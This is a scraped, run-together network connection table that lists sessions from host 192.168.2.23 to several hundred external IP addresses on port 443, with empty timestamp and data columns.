                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11321192.168.2.2348794116.87.192.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11322192.168.2.234438080.225.136.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11323192.168.2.2348324162.250.72.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11324192.168.2.235391654.80.170.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11325192.168.2.233419082.133.224.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11326192.168.2.2347366163.116.177.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11327192.168.2.2338516116.36.3.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11328192.168.2.2334782207.98.185.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11329192.168.2.2354628118.200.97.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11330192.168.2.234400878.140.243.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11331192.168.2.23337364.144.193.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11332192.168.2.235203420.174.99.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11333192.168.2.233663035.74.148.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11334192.168.2.2352424144.52.197.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11335192.168.2.2351914198.166.87.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11336192.168.2.233330696.27.239.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11337192.168.2.234513253.164.121.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11338192.168.2.2335152168.183.184.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11339192.168.2.233418087.122.65.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11340192.168.2.2354598109.128.165.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11341192.168.2.2356364195.17.93.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11342192.168.2.234518690.199.39.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11343192.168.2.2347408134.205.84.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11344192.168.2.2359212145.214.216.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11345192.168.2.23598388.147.40.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11346192.168.2.2343370145.92.12.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11347192.168.2.233975644.79.56.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11348192.168.2.2351452196.206.28.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11349192.168.2.2335648108.91.123.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11350192.168.2.2358154203.143.15.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11351192.168.2.236082692.126.243.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11352192.168.2.2337418174.40.147.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11353192.168.2.2357150137.171.4.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11354192.168.2.234999878.124.58.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11355192.168.2.2347588192.181.93.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11356192.168.2.236085275.107.101.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11357192.168.2.2351190174.69.152.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11358192.168.2.2340296187.203.159.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11359192.168.2.2344986139.62.86.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11360192.168.2.2355908202.15.191.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11361192.168.2.2359186199.225.143.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11362192.168.2.234533697.140.21.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11363192.168.2.2358898206.41.82.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11364192.168.2.2346298181.102.186.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11365192.168.2.2357814100.194.27.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11366192.168.2.234870461.203.158.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11367192.168.2.2355420134.50.46.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11368192.168.2.2334034117.233.110.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11369192.168.2.2353732157.182.65.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11370192.168.2.235864874.147.112.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11371192.168.2.2355258137.199.4.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11372192.168.2.2354334122.215.168.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11373192.168.2.233791296.141.192.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11374192.168.2.2341078152.138.244.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11375192.168.2.233947058.109.91.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11376192.168.2.234952892.193.45.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11377192.168.2.23594624.232.192.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11378192.168.2.2346548131.162.107.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11379192.168.2.233327444.126.166.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11380192.168.2.2339238107.79.173.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11381192.168.2.2359312121.112.18.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11382192.168.2.2351434197.232.72.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11383192.168.2.234793651.124.186.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11384192.168.2.234973491.171.77.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11385192.168.2.235338875.220.41.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11386192.168.2.2340184126.75.151.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11387192.168.2.2349064172.152.96.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11388192.168.2.2351950133.134.37.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11389192.168.2.2358844130.44.57.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11390192.168.2.234003497.171.219.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11391192.168.2.2335376221.134.100.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11392192.168.2.2348246199.225.14.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11393192.168.2.235682446.157.133.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11394192.168.2.2360504118.66.11.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11395192.168.2.236007048.226.6.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11396192.168.2.2357906146.30.28.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11397192.168.2.234416844.39.211.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11398192.168.2.2344976162.144.106.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11399192.168.2.2360188109.28.22.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11400192.168.2.2343244146.195.241.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11401192.168.2.2337872122.97.119.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11402192.168.2.2347628107.247.168.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11403192.168.2.2344124200.1.185.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11404192.168.2.2354400169.89.24.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11405192.168.2.2341392184.43.59.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11406192.168.2.2344342122.118.147.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11407192.168.2.2338282177.126.253.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11408192.168.2.2350714128.151.78.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11409192.168.2.2343382159.27.86.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11410192.168.2.234593249.182.230.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11411192.168.2.233316661.147.245.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11412192.168.2.236008882.240.240.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11413192.168.2.234099039.143.157.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11414192.168.2.2334572174.243.147.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11415192.168.2.234828259.218.29.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11416192.168.2.2342568188.253.94.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11417192.168.2.2360580206.73.189.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11418192.168.2.234753263.9.254.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11419192.168.2.233355699.110.106.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11420192.168.2.2346762187.3.109.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11421192.168.2.235780227.118.202.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11422192.168.2.2356864165.57.13.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11423192.168.2.234334050.149.77.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11424192.168.2.2348384188.182.205.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11425192.168.2.2339782137.153.44.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11426192.168.2.2351860137.89.250.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11427192.168.2.2333568114.132.84.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11428192.168.2.2342442144.237.138.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11429192.168.2.235857458.124.232.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11430192.168.2.234348094.154.222.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11431192.168.2.2359000105.221.30.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11432192.168.2.234375699.49.251.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11433192.168.2.235565290.110.179.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11434192.168.2.233583038.49.205.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11435192.168.2.2340032181.113.142.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11436192.168.2.2356712169.128.234.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11437192.168.2.236003479.88.9.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11438192.168.2.234557049.232.181.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11439192.168.2.234144096.62.165.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11440192.168.2.2337216104.55.126.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11441192.168.2.2335378179.6.185.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11442192.168.2.2337204186.162.41.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11443192.168.2.2349842171.132.0.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11444192.168.2.234085241.248.88.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11445192.168.2.2350300184.134.130.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11446192.168.2.233661254.48.168.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11447192.168.2.233940434.43.225.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11448192.168.2.234228819.143.15.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11449192.168.2.2357292119.102.39.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11450192.168.2.2338964125.59.252.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11451192.168.2.234397812.165.99.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11452192.168.2.2343426202.160.51.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11453192.168.2.2339670128.68.110.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11454192.168.2.233989282.192.161.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11455192.168.2.234146086.23.178.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11456192.168.2.2357250130.241.160.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11457192.168.2.235150099.82.129.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11458192.168.2.235469435.142.151.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11459192.168.2.233338612.191.78.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11460192.168.2.2335404173.147.207.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11461192.168.2.233519224.72.131.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11462192.168.2.2356302123.228.228.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11463192.168.2.234232874.253.17.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11464192.168.2.2335122183.159.151.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11465192.168.2.2343286129.204.10.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11466192.168.2.2333220132.173.122.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11467192.168.2.234614243.199.85.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11468192.168.2.2345968102.88.171.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11469192.168.2.2340568199.59.37.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11470192.168.2.234716696.32.84.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11471192.168.2.2339786200.197.155.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11472192.168.2.2342760188.198.229.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11473192.168.2.234749012.131.246.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11474192.168.2.2354202206.206.222.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11475192.168.2.234757292.94.188.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11476192.168.2.2343940118.125.57.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11477192.168.2.2343040105.127.151.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11478192.168.2.234768257.35.87.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11479192.168.2.2338186202.51.17.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11480192.168.2.2335698102.35.99.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11481192.168.2.2360440120.118.130.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11482192.168.2.2335332153.44.189.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11483192.168.2.233723470.51.68.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11484192.168.2.235610657.16.60.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11485192.168.2.2350316138.6.159.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11486192.168.2.234093697.67.20.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11487192.168.2.235898631.25.67.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11488192.168.2.2343874178.106.207.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11489192.168.2.2345230181.187.18.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11490192.168.2.234414276.56.79.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11491192.168.2.2341696146.170.190.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11492192.168.2.2335284143.204.131.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11493192.168.2.2357898155.197.194.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11494192.168.2.2343738110.34.139.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11495192.168.2.2339980193.231.224.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11496192.168.2.233996694.113.155.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11497192.168.2.2339882158.180.43.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11498192.168.2.234994431.159.32.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11499192.168.2.2356656110.91.43.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11500192.168.2.2355496206.64.189.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11501192.168.2.2359648120.116.115.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11502192.168.2.2333618141.111.57.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11503192.168.2.2354440112.30.127.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11504192.168.2.2345978191.64.117.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11505192.168.2.233680667.125.200.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11506192.168.2.2356194119.115.134.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11507192.168.2.2337154189.2.17.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11508192.168.2.234985665.187.16.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11509192.168.2.234199425.4.52.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11510192.168.2.2339796177.36.149.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11511192.168.2.234904444.199.170.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11512192.168.2.2359714104.239.15.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11513192.168.2.234032837.208.158.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11514192.168.2.2352972186.177.22.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11515192.168.2.234898019.11.233.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11516192.168.2.2343894208.225.105.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11517192.168.2.2355318137.78.125.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11518192.168.2.2360472121.110.234.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11519192.168.2.2333158136.203.152.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11520192.168.2.235358877.4.76.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11521192.168.2.23363464.33.151.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11522192.168.2.234456648.214.171.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11523192.168.2.2334006207.68.7.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11524192.168.2.2338980199.100.24.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11525192.168.2.235241047.38.128.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11526192.168.2.2343274197.0.33.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11527192.168.2.233607451.187.94.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11528192.168.2.2333906183.90.29.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11529192.168.2.233351087.236.203.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11530192.168.2.234969413.89.149.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11531192.168.2.235723874.140.230.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11532192.168.2.2359210212.14.100.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11533192.168.2.2341028114.183.84.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11534192.168.2.235921889.60.246.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11535192.168.2.23500704.109.24.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11536192.168.2.234431886.76.90.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11537192.168.2.233923092.24.5.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11538192.168.2.23425769.1.225.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11539192.168.2.2345480102.28.71.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11540192.168.2.2343960213.7.215.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11541192.168.2.235371062.42.12.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
